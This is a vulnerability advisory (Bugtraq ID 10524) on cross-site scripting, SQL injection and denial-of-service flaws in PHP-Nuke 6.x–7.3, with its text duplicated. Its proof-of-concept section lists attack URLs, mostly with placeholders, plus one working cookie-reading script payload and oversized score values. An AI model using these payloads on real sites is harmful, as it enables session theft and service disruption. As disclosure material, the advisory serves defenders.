PHP-Nuke Multiple Input Validation Vulnerabilities
BID:10524
Info
PHP-Nuke Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 10524 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 11 2004 12:00AM |
| Updated: | Jun 11 2004 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to Janek Vind <[email protected]>. |
| Vulnerable: |
Francisco Burzi PHP-Nuke 7.3 Francisco Burzi PHP-Nuke 7.2 Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 FINAL Francisco Burzi PHP-Nuke 7.0 Francisco Burzi PHP-Nuke 6.9 Francisco Burzi PHP-Nuke 6.7 Francisco Burzi PHP-Nuke 6.6 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 FINAL Francisco Burzi PHP-Nuke 6.5 BETA 1 Francisco Burzi PHP-Nuke 6.5 Francisco Burzi PHP-Nuke 6.0 |
| Not Vulnerable: | |
Discussion
PHP-Nuke Multiple Input Validation Vulnerabilities
PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PHP-Nuke is prone to multiple cross-site scripting vulnerabilities. These issues affect the 'Faq', 'Encyclopedia' and 'Reviews' modules.
These cross-site scripting issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer.
PHP-Nuke is prone to an SQL Injection Vulnerability. Again the issue is due to a failure of the application to properly sanitize user-supplied input. The problem presents itself when SQL syntax is passed through the a parameter of the 'Reviews' module.
As a result of this issue an attacker could modify the logic and structure of database queries.
Finally a remote denial of service vulnerability is reported to exist in the score subsystem of the 'Review' module of PHP-Nuke, it is reported that a large number supplied as a value for a parameter passed to the 'Reviews' module will deny service to legitimate PHP-Nuke users.
PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PHP-Nuke is prone to multiple cross-site scripting vulnerabilities. These issues affect the 'Faq', 'Encyclopedia' and 'Reviews' modules.
These cross-site scripting issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer.
PHP-Nuke is prone to an SQL Injection Vulnerability. Again the issue is due to a failure of the application to properly sanitize user-supplied input. The problem presents itself when SQL syntax is passed through the a parameter of the 'Reviews' module.
As a result of this issue an attacker could modify the logic and structure of database queries.
Finally a remote denial of service vulnerability is reported to exist in the score subsystem of the 'Review' module of PHP-Nuke, it is reported that a large number supplied as a value for a parameter passed to the 'Reviews' module will deny service to legitimate PHP-Nuke users.
Exploit / POC
PHP-Nuke Multiple Input Validation Vulnerabilities
The following examples are available:
http://www.example.com/nuke73/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&op=terms&eid=1<r=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&file=search&eid=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&file=search&query=f00bar&eid=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=[xss code here]
http://www.example.com/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253
c/script>bar
http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[xss code here]&id=8&score=9
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Q&order=[sql injection code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999
http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
The following examples are available:
http://www.example.com/nuke73/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&op=terms&eid=1<r=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&file=search&eid=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&file=search&query=f00bar&eid=[xss code here]
http://www.example.com/nuke73/modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=[xss code here]
http://www.example.com/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253
c/script>bar
http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[xss code here]&id=8&score=9
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Q&order=[sql injection code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999
http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
Solution / Fix
PHP-Nuke Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP-Nuke Multiple Input Validation Vulnerabilities
References:
References:
- PHPNuke INP Homepage (PHPNuke INP)
- [waraxe-2004-SA#032 - Multiple security flaws in PhpNuke 6.x - 7.3] (Janek Vind
)